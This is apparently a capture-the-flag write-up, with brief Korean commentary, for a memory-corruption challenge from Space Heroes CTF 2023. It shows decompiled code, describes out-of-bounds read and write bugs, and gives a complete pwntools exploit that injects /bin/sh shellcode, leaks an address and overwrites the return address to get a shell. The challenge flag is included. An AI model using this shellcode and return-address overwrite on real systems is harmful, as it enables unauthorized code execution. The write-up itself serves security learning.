Space Heroes CTF 2023 - Cardassian Targeting System (oob, shellcode)

• https://ctftime.org/event/1856

?

• [? solves / 249 points]

Analysis

int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
  int selectedOption; // [rsp+0h] [rbp-70h] BYREF
  int pageSize; // [rsp+4h] [rbp-6Ch]
  char *addr; // [rsp+8h] [rbp-68h] BYREF
  __int64 array[10]; // [rsp+10h] [rbp-60h] BYREF
  unsigned __int64 v7; // [rsp+68h] [rbp-8h]

  v7 = __readfsqword(0x28u);
  print_art();
  putchar(10);
  addr = malloc(0x40uLL);
  pageSize = getpagesize();
  posix_memalign(&addr, pageSize, pageSize);    // pageSize = 4096 0x1000
  mprotect(addr, pageSize, 7);
  printf("Please enter your name and rank >>> ");
  fgets(addr, 64, _bss_start);
  printf("\nWelcome back, %s\n", addr);
  while ( 1 )
  {
    print_menu();
    __isoc99_scanf("%d", &selectedOption);
    getchar();
    performAction(selectedOption, array);
  }
}

malloc을 통해 반환된 heap은 mprotect 함수로 인해 실행 권한이 주어진 영역이 되었다. 여기에 쉘코드를 넣고 흐름을 여기로 전환시키면 될 것 같다.

performAction 함수에서 대놓고 oob read와 oob write를 찾을 수 있다.

Solve

Exploit Code

from pwn import * 

p = remote("spaceheroes-cardassian-targeting-system.chals.io", 443, ssl=True, sni="spaceheroes-cardassian-targeting-system.chals.io")
# p = process('./cardassian-targeting-system')
e = ELF('./cardassian-targeting-system')

def oob_read(idx):
    p.sendline(str(4))
    # pause()
    p.sendline(str(idx))
    p.recvuntil('coordinates: ')
    return int(p.recvline(), 10)

def oob_write(idx, data):
    p.sendline(str(3))
    pause()
    p.sendline(str(idx))
    p.sendline(str(data))

def asdf(shellcode):
    p.sendline(shellcode)

shellcode = b"\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05"
asdf(shellcode)

heap = oob_read(-1)
info(hex(heap))

# -3 : ret
oob_write(-3, heap)

p.interactive()

Flag

shctf{cardass1an5_ar3_m3t1culou5_r3c0rd_k33p3rs}